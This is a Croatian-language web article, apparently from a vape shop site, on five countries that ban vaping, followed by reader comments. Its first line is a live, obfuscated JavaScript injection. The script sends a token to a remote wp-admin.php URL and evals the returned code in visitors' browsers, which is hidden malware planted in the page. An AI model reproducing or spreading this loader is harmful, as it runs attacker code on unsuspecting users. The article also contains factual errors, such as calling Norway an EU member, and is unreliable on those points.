;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
Zabrana korištenja e cigareta

TOP 5 ZEMALJA U KOJIMA JE VAPE ZABRANJEN ZAKONOM

Zakoni koji se odnose na upotrebu i prodaju vape opreme i e-tekućina širom svijeta se konstantno mijenjaju u skladu s istraživanjima i novim informacijama o prednostima i štetnosti njihovog korištenja. Većina njih se najviše oslanja na izvještaje Svjetske Zdravstvene Organizacije, ali su ipak od države do države dramatično različiti. Dobra vijest za turiste koji koriste osobne isparivače je da većina zemalja Europske Unije, Velika Britanija, te Kanada i Novi Zeland imaju progresivan i fleksibilan stav u vezi prodaje i upotrebe e-cigareta, vape opreme, kao i e-tekućina. U ostalim zemljama, zakoni koji su trenutno na snazi variraju od zabrane prodaje vape uređaja i popratne opreme, zabrane tekućina koje sadrže nikotin, pa do najekstremnijih slučajeva kada posjedovanje vape opreme povlači novčane ili čak i ozbiljne zatvorske kazne.

Osvrnimo se sada na top 5 zemalja u kojima je vape potpuno zabranjen i neke zanimljive činjenice u vezi s time:

Tajland

Kao država sa najrestriktivnijim zakonom u kojoj se svako posjedovanje, upotreba i prodaja vape kažnjava konfiskacijom i kaznom zatvora do čak 10 godina. Ako ste strastveni vaper, Tajland, uz zemlje Bliskog istoka i jugoistočne Azije svakako nije dobra destinacija za vas. Nažalost, turisti nisu uvijek upoznati s lokalnim zakonima, a upravo u Tajlandu nalazimo na najbrojnije slučajeve turista koji su nastradali zbog posjedovanja vape opreme. Jedan od poznatijih primjera je onaj francuske državljanke kojoj je na carini pronađena e-cigareta zbog čega joj je naplaćena novčana kazna od 40,000 bahta, a žena je deportirana. Ipak, ovaj zakon za Tajlanđane nije ništa novo pošto je na snazi već od 2014. godine i kako stvari stoje, nemamo razloga vjerovati da će se restrikcije elektronskih cigareta skorije vrijeme ublažiti. Naravno, to ne znači da je vape u potpunosti iskorišten u Tajlandu, već je to zemlja u kojoj je ilegalna prodaja e-cigareta i prateće opreme procijenjena u vrijednosti do čak 200,000,00 dolara.

Indija

Indija u kojoj je uvoženje, prodaja i reklamiranje vape opreme i tekućina potpuno zabranjeno od 2019. godine. Iako je ovo zemlja sa preko 100 milijuna punoljetnih pušača i službeno potvrđenih skoro milijun ljudi godišnje umrlih od posljedica pušenja, indijska vlada je vodeći se istraživanjima ZSO-a donijela ovu zabranu koja ne zabranjuje samo korištenje elektronskih cigareta za osobnu upotrebu, ali u praksi to ne funkcionira baš tako pošto su brojni turisti prijavili da su im osobni isparivači oduzeti od strane nadležnih organa.

Meksiko

Kao i u većini južnoameričkih zemalja, upotreba, uvoz i prodaja e cigareta je zabranjena. I dok se, po iskustvima turista, u većini ovih zemalja ta restrikcija ne sprovodi revnosno, meksički zakon je nedvosmislen. U ovoj zemlji je zabranjena prodaj i upotreba svega što „liči duhanu, a nije duhan.“

Norveška

Jedina zemlja u Europskoj uniji koja ima zakonom reguliranu zabranu upotrebe osobnih isparivača. Pri tome se ova zabrana odnosi isključivo na proizvode koji sadrže nikotin, a samim Norvežanima je potrebna potvrda doktora da im vape ili e-cigareta pomažu u odvikavanju od pušenja da bi je mogli uvesti i koristiti.

Turska

Na 5. mjestu ove liste ponajviše zbog činjenice da je jedna od najčešćih destinacija turista sa naših prostora. Upotreba e cigareta u ovoj zemlji nije dozvoljena, a iskustva naših turista govore da nekih većih neugodnosti i oduzimanja opreme i tekućina nije bilo, ali svakako treba izbjegavati puffkanje na javnim mjestima.

I na kraju, zaključimo ovu listu sa par korisnih informacija i podataka za korisnike e-cigareta na teritoriji Sjedinjenih Američkih Država. Federalni zakon jasno zabranjuje kupovinu vape opreme mlađima od 18 godina, ali su zakoni u saveznim državama drugačiji, čak i dijametralno različiti. Dok su stručne rasprave o utjecaju elektronskih cigareta na mlade još u toku, postoje države koje su granicu kupovine pomakle na 21 godinu, a na drugom kraju spektra kao najdramatičniji primjer je San Francisco u kojem su upotreba, prodaja i uvoz vape opreme i tekućina potpuno zabranjeni.

S.T.

Choose your Reaction!
  • Neka njih tamo, a nas ovdje. Koliko god neke druge stvari u gore spomenutim zemljama možda bolje funkcioniraju nego tu kod nas. Ne idem nikud, ovdje mi je baš fajn ;)

  • Vidiš, nisam znao ovo, ali zapanjujuće… Tajland koji je sodoma i gomora, Meksiko koji je pun droge i Indija koja je prepuna kojekakvog smeća, otrova i smrada zabranjuje alternativu odvratnom nezdravom pušačkom životu :D

  • Što se tiče Norveške iqos je zabranjen i nemogu se kupiti punjenja za njega. A što se tiče električnih cigareta ima 3 dućana u Oslu sa opremom I tekućinama sve su tekućine 0 mg osim ako ne sredite nešto ispod stola. :D

  • A nećeš ti zemalja, osim Norveške, sve sami zagađivači. Meksiko ne zna gdje će sa drogom i narko kartelima. Indijski Ganges bi mogao zatrovati cijeli svijet, Tajland ima industrije za pola svijeta zagaditi, a Turci..ajme

  • kak se vidi da je Simona pisala :) ovo za Norvešku nisam imao pojma do neki dan kad je žena nešto o tome čitala…

Leave a Comment